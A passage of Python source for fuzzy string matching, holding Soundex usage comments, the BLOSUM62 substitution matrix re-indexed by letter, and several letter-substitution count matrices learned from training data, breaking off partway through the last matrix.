# print soundex1.compare(c, a)
# print soundex1.compare(a,d)
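# Hedged usage sketch for the fuzzy.Soundex API tried above (kept commented so the
# matcher below runs even without the extension; the names are illustrative):
#   soundex4 = fuzzy.Soundex(4)
#   soundex4('nelson') == soundex4('neilsen')   # True when the 4-char codes agree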
''' Using Other Method(Optional):
# Other1: Use improved BLOSUM62 matrix:
Original BLOSUM62 matrix as below:
C S T P A G N D E Q H R K M I L V F Y W
C 9 -1 -1 -3 0 -3 -3 -3 -4 -3 -3 -3 -3 -1 -1 -1 -1 -2 -2 -2
S -1 4 1 -1 1 0 1 0 0 0 -1 -1 0 -1 -2 -2 -2 -2 -2 -3
T -1 1 4 1 -1 1 0 1 0 0 0 -1 0 -1 -2 -2 -2 -2 -2 -3
P -3 -1 1 7 -1 -2 -1 -1 -1 -1 -2 -2 -1 -2 -3 -3 -2 -4 -3 -4
A 0 1 -1 -1 4 0 -1 -2 -1 -1 -2 -1 -1 -1 -1 -1 -2 -2 -2 -3
G -3 0 1 -2 0 6 -2 -1 -2 -2 -2 -2 -2 -3 -4 -4 0 -3 -3 -2
N -3 1 0 -2 -2 0 6 1 0 0 -1 0 0 -2 -3 -3 -3 -3 -2 -4
D -3 0 1 -1 -2 -1 1 6 2 0 -1 -2 -1 -3 -3 -4 -3 -3 -3 -4
E -4 0 0 -1 -1 -2 0 2 5 2 0 0 1 -2 -3 -3 -3 -3 -2 -3
Q -3 0 0 -1 -1 -2 0 0 2 5 0 1 1 0 -3 -2 -2 -3 -1 -2
H -3 -1 0 -2 -2 -2 1 1 0 0 8 0 -1 -2 -3 -3 -2 -1 2 -2
R -3 -1 -1 -2 -1 -2 0 -2 0 1 0 5 2 -1 -3 -2 -3 -3 -2 -3
K -3 0 0 -1 -1 -2 0 -1 1 1 -1 2 5 -1 -3 -2 -3 -3 -2 -3
M -1 -1 -1 -2 -1 -3 -2 -3 -2 0 -2 -1 -1 5 1 2 -2 0 -1 -1
I -1 -2 -2 -3 -1 -4 -3 -3 -3 -3 -3 -3 -3 1 4 2 1 0 -1 -3
L -1 -2 -2 -3 -1 -4 -3 -4 -3 -2 -3 -2 -2 2 2 4 3 0 -1 -2
V -1 -2 -2 -2 0 -3 -3 -3 -2 -2 -3 -3 -2 1 3 1 4 -1 -1 -3
F -2 -2 -2 -4 -2 -3 -3 -3 -3 -3 -1 -3 -3 0 0 0 -1 6 3 1
Y -2 -2 -2 -3 -2 -3 -2 -3 -2 -1 2 -2 -2 -1 -1 -1 -1 3 7 2
W -2 -3 -3 -4 -3 -2 -4 -4 -3 -2 -2 -3 -3 -1 -3 -2 -3 1 2 11
Modified BLOSUM62 matrix as below:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
A 4 * 0 -2 -1 -2 0 -2 -1 * -1 -1 -1 -1 * -1 -1 -1 1 -1 * -2 -3 * -2 *
B * * * * * * * * * * * * * * * * * * * * * * * * * *
C 0 * 9 -3 -4 -2 -3 -3 -1 * -3 -1 -1 -3 * -3 -3 -3 -1 -1 * -1 -2 * -2 *
D  -2  *  -3  6  2  -3 -1 -1 -3  * -1 -4 -3  1  * -1  0 -2  0  1  * -3 -4  * -3  *
E -1 * -4 2 5 -3 -2 0 -3 * 1 -3 -2 0 * -1 2 0 0 0 * -3 -3 * -2 *
F -2 * -2 -3 -3 6 -3 -1 0 * -3 0 0 -3 * -4 -3 -3 -2 -2 * -1 1 * 3 *
G 0 * -3 -1 -2 -3 6 -2 -4 * -2 -4 -3 -2 * -2 -2 -2 0 1 * 0 -2 * -3 *
H -2 * -3 1 0 -1 -2 8 -3 * -1 -3 -2 1 * -2 0 0 -1 0 * -2 -2 * 2 *
I -1 * -1 -3 -3 0 -4 -3 4 * -3 2 1 -3 * -3 -3 -3 -2 -2 * 1 -3 * -1 *
J * * * * * * * * * * * * * * * * * * * * * * * * * *
K -1 * -3 -1 1 -3 -2 -1 -3 * 5 -2 -1 0 * -1 1 2 0 0 * -3 -3 * -2 *
L -1 * -1 -4 -3 0 -4 -3 2 * -2 4 2 -3 * -3 -2 -2 -2 -2 * 3 -2 * -1 *
M -1 * -1 -3 -2 0 -3 -2 1 * -1 2 5 -2 * -2 0 -1 -1 -1 * -2 -1 * -1 *
N -2 * -3 1 0 -3 0 -1 -3 * 0 -3 -2 6 * -2 0 0 1 0 * -3 -4 * -2 *
O * * * * * * * * * * * * * * * * * * * * * * * * * *
P -1 * -3 -1 -1 -4 -2 -2 -3 * -1 -3 -2 -1 * 7 -1 -2 -1 1 * -2 -4 * -3 *
Q -1 * -3 0 2 -3 -2 0 -3 * 1 -2 0 0 * -1 5 1 0 0 * -2 -2 * -1 *
R -1 * -3 -4 0 -3 -2 0 -3 * 2 -2 -1 0 * -2 1 5 -1 -1 * -3 -3 * -2 *
S 1 * -1 0 0 -2 0 -1 -2 * 0 -2 -1 1 * -1 0 -1 4 1 * -2 -3 * -2 *
T -1 * -1 1 0 -2 1 0 -2 * 0 -2 -1 0 * 1 0 -1 1 4 * -2 -3 * -2 *
U * * * * * * * * * * * * * * * * * * * * * * * * * *
V 0 * -1 -3 -2 -1 -3 -3 3 * -2 1 1 -3 * -2 -2 -3 -2 -2 * 4 -3 * -1 *
W -3 * -2 -4 -3 1 -2 -2 -3 * -3 -2 -1 -4 * -4 -2 -3 -3 -3 * -3 11 * 2 *
X * * * * * * * * * * * * * * * * * * * * * * * * * *
Y -2 * -2 -3 -2 3 -3 2 -1 * -2 -1 -1 -2 * -3 -1 -2 -2 -2 * -1 2 * 7 *
Z * * * * * * * * * * * * * * * * * * * * * * * * * *
'''
# Initialize the original BLOSUM62 matrix (rows/columns indexed a-z via ord(c) - 97):
ori_blosum62 = [
[ 4, 0, 0,-2,-1,-2, 0,-2,-1, 0,-1,-1,-1,-1, 0,-1,-1,-1, 1,-1, 0,-2,-3, 0,-2, 0 ],
[ 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 9,-3,-4,-2,-3,-3,-1, 0,-3,-1,-1,-3, 0,-3,-3,-3,-1,-1, 0,-1,-2, 0,-2, 0 ],
[-2, 0,-3, 6, 2,-3,-1,-1,-3, 0,-1,-4,-3, 1, 0,-1, 0,-2, 0, 1, 0,-3,-4, 0,-3, 0 ],
[-1, 0,-4, 2, 5,-3,-2, 0,-3, 0, 1,-3,-2, 0, 0,-1, 2, 0, 0, 0, 0,-3,-3, 0,-2, 0 ],
[-2, 0,-2,-3,-3, 6,-3,-1, 0, 0,-3, 0, 0,-3, 0,-4,-3,-3,-2,-2, 0,-1, 1, 0, 3, 0 ],
[ 0, 0,-3,-1,-2,-3, 6,-2,-4, 0,-2,-4,-3,-2, 0,-2,-2,-2, 0, 1, 0, 0,-2, 0,-3, 0 ],
[-2, 0,-3, 1, 0,-1,-2, 8,-3, 0,-1,-3,-2, 1, 0,-2, 0, 0,-1, 0, 0,-2,-2, 0, 2, 0 ],
[-1, 0,-1,-3,-3, 0,-4,-3, 4, 0,-3, 2, 1,-3, 0,-3,-3,-3,-2,-2, 0, 1,-3, 0,-1, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[-1, 0,-3,-1, 1,-3,-2,-1,-3, 0, 5,-2,-1, 0, 0,-1, 1, 2, 0, 0, 0,-3,-3, 0,-2, 0 ],
[-1, 0,-1,-4,-3, 0,-4,-3, 2, 0,-2, 4, 2,-3, 0,-3,-2,-2,-2,-2, 0, 3,-2, 0,-1, 0 ],
[-1, 0,-1,-3,-2, 0,-3,-2, 1, 0,-1, 2, 5,-2, 0,-2, 0,-1,-1,-1, 0,-2,-1, 0,-1, 0 ],
[-2, 0,-3, 1, 0,-3, 0,-1,-3, 0, 0,-3,-2, 6, 0,-2, 0, 0, 1, 0, 0,-3,-4, 0,-2, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[-1, 0,-3,-1,-1,-4,-2,-2,-3, 0,-1,-3,-2,-1, 0, 7,-1,-2,-1, 1, 0,-2,-4, 0,-3, 0 ],
[-1, 0,-3, 0, 2,-3,-2, 0,-3, 0, 1,-2, 0, 0, 0,-1, 5, 1, 0, 0, 0,-2,-2, 0,-1, 0 ],
[-1, 0,-3,-4, 0,-3,-2, 0,-3, 0, 2,-2,-1, 0, 0,-2, 1, 5,-1,-1, 0,-3,-3, 0,-2, 0 ],
[ 1, 0,-1, 0, 0,-2, 0,-1,-2, 0, 0,-2,-1, 1, 0,-1, 0,-1, 4, 1, 0,-2,-3, 0,-2, 0 ],
[-1, 0,-1, 1, 0,-2, 1, 0,-2, 0, 0,-2,-1, 0, 0, 1, 0,-1, 1, 4, 0,-2,-3, 0,-2, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0 ],
[ 0, 0,-1,-3,-2,-1,-3,-3, 3, 0,-2, 1, 1,-3, 0,-2,-2,-3,-2,-2, 0, 4,-3, 0,-1, 0 ],
[-3, 0,-2,-4,-3, 1,-2,-2,-3, 0,-3,-2,-1,-4, 0,-4,-2,-3,-3,-3, 0,-3,11, 0, 2, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0 ],
[-2, 0,-2,-3,-2, 3,-3, 2,-1, 0,-2,-1,-1,-2, 0,-3,-1,-2,-2,-2, 0,-1, 2, 0, 7, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5 ],
]
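# Illustrative lookup (a sketch, not used by the matcher below): rows and columns
# are indexed by ord(letter) - 97, so 'a' maps to 0 and 'z' to 25.
example_sub_score = ori_blosum62[ord('m') - 97][ord('n') - 97]   # -2: 'm' aligned with 'n'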
# Initialize the improved matrix learned from the first 100 training lines:
# improvedMatrix_100 = [
# [763, 4, 3, 3, 31, 0, 2, 3, 43, 0, 1, 3, 1, 4, 82, 0, 0, 7, 47, 2, 65, 0, 2, 0, 16, 1 ],
# [ 3, 147, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0 ],
# [ 0, 0, 2, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 226, 4, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 68, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0 ],
# [ 3, 0, 0, 0, 3, 0, 142, 0, 2, 0, 0, 4, 0, 2, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 3, 0, 0, 0, 22, 0, 0, 70, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 5, 0, 7, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 2, 0, 79, 0, 8, 0, 0, 0, 3, 0, 173, 0, 0, 1, 2, 0, 8, 1, 0, 0, 3, 0, 2, 3, 0, 0 ],
# [ 5, 0, 0, 0, 12, 0, 0, 0, 1, 0, 0, 278, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 3, 0, 0, 0, 3, 0, 0, 0, 2, 0, 0, 0, 219, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 2, 0, 1, 1, 14, 0, 8, 0, 2, 0, 0, 1, 0, 466, 2, 0, 0, 1, 1, 4, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 84, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 4, 1, 0, 0, 8, 0, 1, 0, 10, 0, 1, 0, 0, 3, 2, 0, 0, 365, 1, 0, 0, 0, 0, 0, 0, 1 ],
# [ 2, 1, 9, 0, 6, 0, 1, 0, 1, 0, 5, 5, 3, 6, 2, 4, 1, 0, 250, 26, 1, 0, 1, 4, 0, 0 ],
# [ 5, 0, 0, 0, 10, 0, 0, 4, 3, 3, 0, 0, 0, 0, 5, 0, 0, 4, 2, 202, 2, 0, 0, 0, 0, 1 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 6, 2, 0, 1, 16, 2, 0, 0, 2, 0, 0, 6, 4, 2, 310, 1, 2, 8, 3, 2, 134, 49, 60, 2, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 22, 1, 3, 4, 80, 1, 3, 0, 447, 0, 4, 9, 1, 21, 2, 2, 0, 11, 5, 11, 18, 3, 1, 0, 98, 4 ],
# [ 4, 1, 0, 0, 2, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 44 ]
# ]
# improvedMatrix_100_Modified = [
# [ 26, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 4, 1, 1, 1, 3, 1, 3, 1, 1, 1, 2, 1 ],
# [ 2, 26, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 26, 1, 1, 1, 1, 14, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 2, 1, 26, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 9, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 4, 1, 5, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 12, 1, 2, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 2, 2, 1, 2, 1, 1, 1, 1, 26, 4, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 2, 1, 1, 12, 5, 6, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 5, 1, 1, 1, 26, 1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 2, 2, 1, 1, 1, 6, 1 ],
# [ 3, 2, 1, 1, 2, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 17, 1, 1, 1, 1, 1, 1, 26 ]
# ]
#
# improvedMatrix_300 = [
# [ 2339, 13, 10, 5, 113, 0, 2, 8, 123, 0, 3, 17, 2, 13, 210, 2, 0, 19, 148, 4, 202, 3, 3, 0, 34, 0 ],
# [ 8, 448, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 0, 0, 3, 0, 0, 0, 3, 0, 7, 0, 8, 0, 0, 0 ],
# [ 0, 0, 3, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 652, 19, 0, 2, 0, 1, 1, 2, 1, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 182, 0, 3, 3, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 2, 0, 0, 0, 9, 0, 413, 0, 3, 0, 0, 2, 0, 1, 1, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 8, 0, 0, 0, 80, 0, 0, 270, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 10, 0, 24, 0, 2, 150, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 10, 0, 252, 0, 29, 0, 0, 0, 3, 0, 432, 3, 0, 1, 7, 0, 34, 6, 0, 0, 10, 0, 0, 11, 0, 0 ],
# [ 10, 3, 3, 3, 21, 0, 0, 0, 8, 0, 2, 822, 0, 0, 5, 0, 0, 2, 3, 9, 1, 0, 0, 0, 0, 0 ],
# [ 10, 0, 0, 0, 12, 0, 0, 0, 2, 0, 0, 0, 617, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0 ],
# [ 3, 0, 0, 13, 17, 0, 15, 0, 6, 0, 3, 2, 1, 1428, 5, 0, 0, 4, 1, 8, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 10, 0, 0, 0, 3, 0, 0, 5, 0, 0, 2, 227, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 5, 5, 5, 0, 25, 0, 3, 3, 10, 0, 1, 1, 1, 2, 7, 1, 0, 1081, 1, 1, 4, 0, 0, 0, 0, 2 ],
# [ 4, 2, 67, 0, 25, 3, 0, 2, 0, 0, 18, 12, 7, 9, 6, 18, 1, 0, 779, 81, 1, 0, 0, 16, 0, 1 ],
# [ 11, 0, 1, 0, 36, 0, 1, 10, 6, 12, 0, 5, 0, 0, 12, 0, 0, 12, 1, 659, 8, 0, 0, 0, 0, 2 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 11, 4, 2, 0, 46, 1, 0, 1, 8, 0, 1, 13, 3, 3, 935, 3, 1, 18, 7, 6, 418, 160, 186, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 62, 10, 17, 7, 219, 1, 4, 0, 1317, 6, 7, 31, 10, 50, 1, 4, 0, 13, 24, 23, 41, 19, 2, 0, 321, 6 ],
# [ 3, 0, 0, 0, 12, 0, 0, 0, 0, 4, 0, 0, 1, 0, 0, 0, 0, 4, 94, 0, 0, 0, 0, 3, 0, 128 ]
# ]
# improvedMatrix_500 = [
# [ 3819, 11, 12, 17, 182, 1, 7, 12, 216, 0, 2, 19, 3, 34, 398, 2, 0, 24, 220, 2, 340, 1, 4, 0, 46, 0 ],
# [ 9, 710, 0, 0, 8, 0, 0, 0, 4, 0, 0, 2, 0, 0, 1, 0, 0, 0, 1, 0, 13, 0, 3, 0, 0, 0 ],
# [ 0, 0, 2, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 1097, 23, 0, 2, 0, 3, 1, 1, 1, 0, 2, 2, 0, 0, 2, 0, 0, 1, 0, 4, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 2, 285, 0, 5, 1, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0 ],
# [ 1, 2, 0, 0, 14, 0, 668, 0, 4, 0, 2, 6, 0, 4, 8, 0, 4, 3, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 22, 0, 0, 0, 111, 0, 0, 442, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 8, 0, 42, 0, 2, 233, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 8, 0, 406, 0, 32, 0, 0, 0, 8, 0, 763, 3, 0, 1, 10, 0, 60, 4, 0, 0, 14, 0, 0, 16, 0, 0 ],
# [ 20, 3, 1, 0, 40, 0, 0, 0, 11, 0, 2, 1428, 0, 1, 14, 0, 0, 4, 7, 2, 2, 0, 0, 0, 0, 0 ],
# [ 16, 0, 0, 0, 17, 0, 0, 0, 4, 0, 0, 0, 1021, 2, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0 ],
# [ 16, 1, 5, 13, 47, 0, 30, 0, 9, 0, 2, 2, 4, 2215, 2, 0, 0, 5, 7, 11, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 15, 0, 0, 0, 5, 0, 0, 4, 0, 0, 9, 429, 0, 2, 0, 0, 2, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 11, 2, 7, 0, 30, 0, 1, 1, 19, 0, 1, 2, 0, 7, 12, 2, 0, 1897, 3, 1, 3, 0, 0, 0, 2, 2 ],
# [ 7, 7, 95, 0, 52, 4, 1, 6, 0, 0, 19, 24, 10, 4, 5, 30, 0, 0, 1277, 122, 0, 0, 3, 28, 0, 0 ],
# [ 22, 0, 0, 0, 44, 0, 3, 14, 21, 5, 0, 3, 0, 0, 19, 0, 0, 21, 9, 1159, 10, 0, 0, 0, 0, 1 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 24, 9, 5, 5, 56, 4, 4, 2, 11, 0, 0, 31, 7, 6, 1612, 3, 3, 30, 11, 9, 681, 275, 309, 0, 3, 2 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 83, 8, 33, 11, 398, 2, 7, 2, 2216, 4, 9, 43, 12, 104, 5, 5, 0, 14, 46, 31, 65, 28, 5, 0, 512, 6 ],
# [ 5, 2, 0, 0, 12, 0, 1, 0, 0, 6, 1, 0, 4, 0, 0, 0, 0, 2, 174, 0, 0, 0, 0, 3, 0, 230 ]
# ]
improvedMatrix_500_Modified = [
[ 26, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 4, 1, 1, 1, 2, 1, 3, 1, 1, 1, 1, 1 ],
[ 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 4, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 26, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 2, 1, 1, 1, 7, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 6, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 14, 1, 2, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 2, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
